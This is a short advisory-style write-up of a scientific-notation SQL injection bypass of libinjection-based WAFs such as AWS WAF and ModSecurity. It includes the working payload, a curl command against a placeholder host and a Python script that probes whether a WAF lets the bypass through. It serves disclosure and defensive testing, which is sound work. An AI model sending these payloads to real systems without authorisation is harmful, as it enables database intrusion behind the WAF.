AWS WAF and the ModSecurity Apache module were affected by a scientific notation bug, first reported in 2013 against the libinjection tokenizer both products relied on, that let an attacker bypass the WAF's SQL injection rules and exploit a SQL injection vulnerability in the application behind it. The root cause is a disagreement between the WAF's SQL tokenizer and MySQL's lexer over how the fragment 1.e(1) is parsed: the WAF does not classify the request as an injection, while MySQL still accepts the expression, so the injected OR condition is evaluated.

The payload used for the attack is shown below; the scientific-notation fragment 1.e(1) sits between the two OR clauses:

"x=1' or 1.e(1) or '1'='1"

Sending it with the following request bypassed the WAF's SQL injection protection and exploited the injection in the underlying web application ($DOMAIN is a placeholder for the target host; curl sends the -d body as-is, so the quotes and parentheses reach the WAF unencoded):

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"
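
To check a WAF for this class of bypass without reading curl output by hand, the following script (an added example, not code from this page or from the GoSecure write-up) posts a benign value, the textbook tautology and the scientific-notation variant to the same form parameter and compares each response with the benign baseline. The target URL, the parameter name x and the 403/406 block status codes are assumptions to adjust for your environment; it needs only the Python standard library.

```python
#!/usr/bin/env python3
"""Probe whether a WAF in front of a form parameter blocks the classic
boolean-based SQLi payload but lets the scientific-notation variant through.

Added example; not code from the page or the GoSecure write-up. The target
URL, the parameter name and the block status codes are assumptions.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Payloads to compare: a benign value, the textbook tautology, and the
# variant from the page above that relies on the tokenizer disagreement.
PAYLOADS = {
    "benign": "1",
    "classic": "1' or '1'='1",
    "scinot": "1' or 1.e(1) or '1'='1",
}

# Status codes a WAF typically returns when it drops a request.
# Assumption: AWS WAF / ModSecurity configured to answer 403 (or 406).
BLOCK_STATUSES = {403, 406}


def encode_form(param: str, value: str) -> bytes:
    """URL-encode the form body; quotes and parentheses are percent-encoded,
    the dot in 1.e(1) is left as-is (it is in urlencode's safe set)."""
    return urllib.parse.urlencode({param: value}).encode()


def send(url: str, param: str, value: str, timeout: float = 10.0):
    """POST one value and return (status, body_length)."""
    req = urllib.request.Request(url, data=encode_form(param, value), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        # 4xx/5xx are data, not failures: a WAF block shows up here.
        return err.code, len(err.read())


def classify(baseline, probe, block_statuses=BLOCK_STATUSES) -> str:
    """Compare a probe response (status, size) with the benign baseline.

    "blocked"         - the WAF stopped the request
    "reached_backend" - passed the WAF and the backend answered differently
                        from the benign request (injection likely evaluated)
    "no_effect"       - passed the WAF, response identical to the baseline
    """
    status, size = probe
    base_status, base_size = baseline
    if status in block_statuses:
        return "blocked"
    if status != base_status or size != base_size:
        return "reached_backend"
    return "no_effect"


def run(url: str, param: str = "x") -> dict:
    """Send every payload and return {name: verdict} for the non-benign ones."""
    baseline = send(url, param, PAYLOADS["benign"])
    return {
        name: classify(baseline, send(url, param, payload))
        for name, payload in PAYLOADS.items()
        if name != "benign"
    }


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} http://target/index.php [param]")
    for name, verdict in run(*sys.argv[1:3]).items():
        print(f"{name:8s} {verdict}")
```

A WAF that reports blocked for classic but reached_backend for scinot is affected. Treat the WAF as defence in depth either way: the durable fix is parameterised queries in the application, and a rule-set update only closes the variants the vendor already knows about.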

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/
